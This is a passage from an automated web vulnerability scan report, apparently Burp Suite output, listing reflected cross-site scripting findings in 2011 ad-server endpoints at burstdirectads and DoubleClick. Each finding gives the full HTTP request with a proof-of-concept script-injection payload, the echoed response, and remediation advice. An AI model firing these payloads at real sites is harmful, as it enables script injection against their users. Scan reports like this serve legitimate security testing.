The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b7e6"-alert(1)-"d39b8a68305 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1858209&bur=50493&x=http://www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS=2jBZy.S7nc/SZ=300X250A/V=2.3S//ST=0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL=&8b7e6"-alert(1)-"d39b8a68305=1 HTTP/1.1
Host: ad.burstdirectads.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:23:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:23:37 GMT
Pragma: no-cache
Content-Length: 5263
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.burstdirectads.com/imp?8b7e6"-alert(1)-"d39b8a68305=1&Z=300x250&bur=50493&s=1858209&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad21832a%2dmap.cgi%2fBCPG175222.253833.315920%2fVTS%3d2jBZy.S7nc%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Qxi0i9J10y61Gbc47hgYD2%5f
...[SNIP]...

5.37. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.burstdirectads.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5f25"><script>alert(1)</script>28bbbb090e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1858209&bur=50493&x=http://www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS=2jBZy.S7nc/SZ=300X250A/V=2.3S//ST=0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL=&c5f25"><script>alert(1)</script>28bbbb090e1=1 HTTP/1.1
Host: ad.burstdirectads.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:23:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 11 May 2011 15:23:35 GMT
Pragma: no-cache
Content-Length: 5308
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.burstdirectads.com/imageclick?Z=300x250&bur=50493&c5f25"><script>alert(1)</script>28bbbb090e1=1&s=1858209&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad21832a%2dmap.cgi%2fBCPG175222.253833.315920%2fVTS%3d2jBZy.S7nc%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Qxi0i9J10y61Gbc47hgYD2%5f3S02vc02vc%2fREDIRUR
...[SNIP]...

5.38. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2581.rocketfuel/B5063370.11

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6dd5a"-alert(1)-"f08a47bece6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305126190103;click=http://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYX&6dd5a"-alert(1)-"f08a47bece6=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=160&h=600&re=12386&pv=0&ra=1261884890.33545748167671263&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBnJBiKaXKTfbKGcXPlQf9z7G2BNeAso8Ch8ybsyLP-5bKHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGz7MfrA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBHmh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL5gCrBHAAgTIAs3vzw7gAgDqAghOZXdzLVNreagDAegDXugDN_UDAACAxOAEAYAG-tK9mvjwpMCkAQ%2526num%253D1%2526sig%253DAGiWqtz5uPi0ksl8IAW_-YJXgk--2xxjBA%2526client%253Dca-pub-9674942009345807%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre1261884899025&pb=&pc=&pd=&pg=&ct=1305126188489&co=false&ep=TcqlKQAGZXYK5WfFRsxn_dF6osENxyPr-Ar0pQ&ri=4dcaa529066576ae567c546cc67fd1&rs=&ai=13892&rt=15540&pe=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F&pf=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:47:08 GMT
Content-Length: 5934

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 10:16:56 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B42128446/42146233/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYX&6dd5a"-alert(1)-"f08a47bece6=1http%3a%2f%2fwww.zumba.com/shop");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW
...[SNIP]...

5.39. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2581.rocketfuel/B5063370.11

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1712"-alert(1)-"7d741984828 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305126190103;click=http://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYXd1712"-alert(1)-"7d741984828 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=160&h=600&re=12386&pv=0&ra=1261884890.33545748167671263&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBnJBiKaXKTfbKGcXPlQf9z7G2BNeAso8Ch8ybsyLP-5bKHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGz7MfrA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBHmh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL5gCrBHAAgTIAs3vzw7gAgDqAghOZXdzLVNreagDAegDXugDN_UDAACAxOAEAYAG-tK9mvjwpMCkAQ%2526num%253D1%2526sig%253DAGiWqtz5uPi0ksl8IAW_-YJXgk--2xxjBA%2526client%253Dca-pub-9674942009345807%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre1261884899025&pb=&pc=&pd=&pg=&ct=1305126188489&co=false&ep=TcqlKQAGZXYK5WfFRsxn_dF6osENxyPr-Ar0pQ&ri=4dcaa529066576ae567c546cc67fd1&rs=&ai=13892&rt=15540&pe=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F&pf=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:45:52 GMT
Content-Length: 5904

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 10:16:56 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
00%3B42128446/42146233/1%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYXd1712"-alert(1)-"7d741984828http://www.zumba.com/shop");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
v
...[SNIP]...

5.40. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12bd2"-alert(1)-"84fa1176aee was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=12bd2"-alert(1)-"84fa1176aee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8167
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:06:23 GMT
Expires: Wed, 11 May 2011 15:06:23 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Y2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=12bd2"-alert(1)-"84fa1176aeehttp://www.tdameritrade.com/offer/250trades/index.html?a=APA&o=199&cid=GENRET;877237;62578502;239944485;41633482");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

5.41. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8f7d"-alert(1)-"3611faec125 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQd8f7d"-alert(1)-"3611faec125&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:03:49 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQd8f7d"-alert(1)-"3611faec125&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyN
...[SNIP]...

5.42. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17a2b"-alert(1)-"8af5856fbe4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-967494200934580717a2b"-alert(1)-"8af5856fbe4&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:05:51 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
XVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=1&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-967494200934580717a2b"-alert(1)-"8af5856fbe4&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpk
...[SNIP]...

5.43. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.34

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ea22"-alert(1)-"9ecabccf172 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5414127.34;sz=160x600;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BPFIjuKPKTcG9EIjilQfLg-X4A63mhMIBhcPSjheF7dq3UwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGrl7rtA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBWWh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=14ea22"-alert(1)-"9ecabccf172&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2BHEsgzxDIUQpJLswqdXR09Sh29TaNcPUMqMhxqiy3tVUCKQcpKM3LzssvzwPxQbpNgLQpkLYwMAMxTYDMvNKcHCDTDMg0M7KwtKwFAGYRG7w-%26redirectURL%3D;ord=TcqjuAAEHsEK5XEIPxlByw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:04:28 GMT
Content-Length: 9245

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
hcnB1bHNlLmNvbS9uZXdzL2luZGV4LnBocC8yMDExLzA1LzEwL2xhZHlfZ2FnYV90b19sYXVuY2hfY2FubmVzX2ZpbG1fZmVzdGl2mAL0K8ACBcgClbKwC-ACAOoCCE5ld3MtU2t5qAMB6AO4AegDA-gDswHoA5gr6AO-CPUDAAAAxOAEAYAG1fmCq7ylpvqMAQ&num=14ea22"-alert(1)-"9ecabccf172&sig=AGiWqtzzy-S6jLLXXb6Pq5hpabkbEO9dOw&client=ca-pub-9674942009345807&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC2
...[SNIP]...

5.44. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
